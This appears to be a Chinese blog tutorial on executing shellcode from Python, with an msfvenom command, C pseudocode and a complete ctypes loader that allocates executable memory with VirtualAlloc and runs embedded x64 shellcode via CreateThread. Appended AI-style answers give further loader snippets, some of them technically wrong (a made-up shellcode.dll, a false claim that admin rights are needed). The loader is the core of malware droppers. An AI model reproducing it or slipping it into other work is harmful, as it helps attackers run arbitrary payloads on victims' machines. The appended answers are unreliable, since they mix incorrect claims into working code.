python 执行shellcode_Python内存加载shellcode

生成

首先生成一个测试的msf shellcode

msfvenom -p windows/x64/exec CMD=calc.exe -f python

把其中的shellcode复制出来留待待会使用

原理

大部分脚本语言加载 shellcode 其实都是通过 c 的 ffi 去调用操作系统的api,其实并没有太多的技巧在里面,明白了原理,只需要查一下对应的脚本语言怎么调用 c 即可。

那么我们只需要明白 c 通常是怎么加载 shellcode 的即可一通百通。

那么 c 是怎么加载 shellcode 呢,我们直接从汇编开始探究。

shellcode 这个东西我们明白是一串可执行的二进制(一般可执行文件的拥有可执行权限的section为.text),那么我们先通过其他的手段开辟一片拥有可读可写可执行权限的区域放入我们的 shellcode,然后跳转到 shellcode 首地址去执行就行了,汇编里面改变eip(即当前指令的下一条即将运行指令的虚拟地址)的方法有不少,最简单的就是直接 jmp 过去了。也就是写成伪码大概意思就是(动态申请内存就不写了)

lea eax, shellcode;

jmp eax;

那么我们用 c 怎么表示呢?我这里也写一段伪码(因为本文的重点并不是在于 c 代码的编写)

那么按照刚才的思路,先申请一块可执行的内存,放入 shellcode 然后跳转过去执行即可。

// shellcode

unsigned char shellcode[] =

"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9"

"\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08"

"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1"

...;

// 定义一个函数类型

typedef void (__stdcall *CODE) ();

// 申请内存

PVOID p = NULL;

p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

// 把shellcode放入内存

memcpy(p, shellcode, sizeof(shellcode));

CODE code =(CODE)p;

code();

我并没有写出一个可用的 c 加载 shellcode,只是旨在点出一下流程,然后引出后面的 python 加载 shellcode,上面我们先申请了一块带有可读可写可执行权限的内存,然后把 shellcode 放进去,然后我们强转为一个函数类型指针,最后调用这个函数,达到了我们的目的。

Python实现

前面我说过,大部分脚本语言加载 shellcode 都是调用的c的ffi,那么我们直接按照之前的思路来就行了。下面我直接贴代码

import ctypes

shellcode = b""

shellcode += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"

shellcode += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"

shellcode += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"

shellcode += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"

shellcode += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"

shellcode += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"

shellcode += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"

shellcode += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"

shellcode += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"

shellcode += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"

shellcode += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"

shellcode += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"

shellcode += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"

shellcode += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"

shellcode += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"

shellcode += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"

shellcode += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"

shellcode += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"

shellcode += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"

shellcode += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"

shellcode += b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65"

shellcode += b"\x78\x65\x00"

shellcode = bytearray(shellcode)

# 设置VirtualAlloc返回类型为ctypes.c_uint64

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

# 申请内存

ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))

# 放入shellcode

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

ctypes.windll.kernel32.RtlMoveMemory(

ctypes.c_uint64(ptr),

buf,

ctypes.c_int(len(shellcode))

)

# 创建一个线程从shellcode防止位置首地址开始执行

handle = ctypes.windll.kernel32.CreateThread(

ctypes.c_int(0),

ctypes.c_int(0),

ctypes.c_uint64(ptr),

ctypes.c_int(0),

ctypes.c_int(0),

ctypes.pointer(ctypes.c_int(0))

)

# 等待上面创建的线程运行完

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

注意其中的的每个 c_uint64,这个类型在64位上是必要的,我们需要手动指定 argtypes 和 restype,否则默认的是 32 位整型。

我的代码里面加了注释,我们可以看到,基本思路也是一样的,先分配一块可读可写可执行代码的内存,在代码中,我使用的是 0x40(PAGE_EXECUTE_READWRITE)和 0x3000 ( 0x1000 | 0x2000)(MEM_COMMIT | MEM_RESERVE),然后把 shellcode 塞进去,跳过去运行。

相信通过这一片文章的讲解你能够对 shellcode 的本质有更多的了解。

### 回答1: 制作 Shellcode 加载器的方法有很多,这里介绍一种基于 Python 的实现方法。 首先,我们需要编写一个能够执行 shellcode 的程序。这个程序可以使用 C 语言编写,也可以使用其他语言编写。下面是一个简单的 C 语言程序,它会执行传入的 shellcode: ```c #include <stdio.h> #include <string.h> int main(int argc, char **argv) { char *shellcode = argv[1]; ((void (*)(void))shellcode)(); return 0; } ``` 编译这个程序: ``` gcc -o shellcode_loader shellcode_loader.c ``` 现在,我们可以使用 Python 来编写一个能够加载 shellcode 的脚本。这个脚本的基本思路是: 1. 将 shellcode 写入内存。 2. 调用 shellcode。 下面是 Python 代码: ```python import ctypes # shellcode shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" # 将 shellcode 写入内存 memory = ctypes.create_string_buffer(shellcode) shellcode_address = ctypes.addressof(memory) # 调用 shellcode func = ctypes.CFUNCTYPE(None) func(shellcode_address) ``` 这个脚本使用 ctypes 库来实现将 shellcode 写入内存和调用 shellcode。首先,我们使用 create_string_buffer() 函数创建一个内存缓冲区,并将 shellcode 写入这个缓冲区。然后,我们使用 addressof() 函数获取缓冲区的内存地址,并将这个地址存储在 shellcode_address 变量中。最后,我们定义一个 CFUNCTYPE 类型的变量 func,并将其初始化为 None。CFUNCTYPE 类型表示一个 C 函数指针类型,它可以用来调用 C 函数。然后,我们可以通过 func(shellcode_address) 调用 shellcode。 需要注意的是,这个脚本必须以管理员权限运行,否则无法将 shellcode 写入内存。 以上就是基于 Pythonshellcode 加载器的实现方法。 ### 回答2: Python是一种高级编程语言,可用于编写各种各样的脚本和程序。当使用Python编写shellcode加载器时,需要了解以下几个关键概念和步骤。 首先,要理解shellcode是什么。Shellcode是一种计算机程序,通常用于利用漏洞或执行特定的操作。Shellcode通常是二进制代码,用于在目标系统上执行指定的操作。 接下来,我们需要了解加载器是如何工作的。加载器是一段代码,其目的是将shellcode注入到目标进程中,并执行它。加载器通常是以DLL文件的形式存在,然后通过各种技术将其注入到目标进程中。 在Python中,可以使用ctypes库来加载DLL并执行其中的函数。ctypes提供了一种在Python中调用动态链接库函数的简单方法。 下面是一个简单的示例程序,用Python编写的shellcode加载器: ``` import ctypes # 加载DLL shellcode_dll = ctypes.WinDLL("shellcode.dll") # 加载器函数 def shellcode_loader(shellcode): # 将shellcode注入到目标进程中 shellcode_dll.LoadShellcode(shellcode) # 调用加载器函数 shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31" shellcode_loader(shellcode) ``` 在上面的示例中,我们首先使用ctypes库加载了一个名为shellcode_dll的DLL文件。然后定义了一个名为shellcode_loader的函数,该函数将接受一个shellcode作为参数,并调用shellcode_dll中的LoadShellcode函数来执行注入操作。最后,我们创建了一个包含实际shellcode的字符串,并将其传递给shellcode_loader函数进行加载。 需要注意的是,为了编写一个完整的shellcode加载器,可能还需要进一步的处理和代码,以适应不同的操作系统和处理器架构。此外,也需要适当的授权和合法用途来使用此代码。 ### 回答3: Python是一种高级编程语言,它的灵活性使得它成为编写加载器的理想工具。一个加载器的目的是将shellcode内存加载到计算机的进程空间,以便运行恶意代码。 使用Python编写一个shellcode加载器的过程如下: 1. 导入所需的模块:首先,在代码的开头,我们需要导入所需的模块。对于shellcode加载器,我们需要使用`ctypes`模块来与C语言进行交互。该模块能够加载动态链接库(DLL)和执行其中的函数。 2. 定义shellcode:在代码的下一部分,我们需要定义要加载shellcode。这可以是由其他工具生成的二进制代码,也可以是手动编写的shellcode。将shellcode保存在一个字符串变量中。 3. 创建内存空间:我们需要为shellcode分配一块内存空间,以便它能够在其中运行。使用`ctypes`模块的`create_string_buffer`函数来创建这块内存空间。通过设置空间的大小来确保能够容纳整个shellcode。 4. 将shellcode复制到内存中:使用Python的`ctypes`库的`memcpy`函数将shellcode复制到之前分配的内存空间中。 5. 将内存设置为可执行:为了使操作系统将这块内存视为可执行代码,我们需要在内存空间上设置相应的标志。使用`ctypes`库的`VirtualProtect`函数可以实现这一点。 6. 执行shellcode:最后,我们需要通过函数指针调用shellcode的入口点,以便开始执行恶意代码。使用`ctypes`库的`CFUNCTYPE`函数创建一个C函数指针,然后使用这个指针来调用shellcode。 编写完成后,可以将代码保存为一个Python脚本,并在命令行中运行它。此时,shellcode将被加载内存中,并开始执行。 需要注意的是,编写和使用shellcode加载器涉及到一些复杂的概念,如内存管理和计算机安全。在实践中,请确保对代码的运行环境和目标平台有透彻的理解,并遵循适当的法律和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值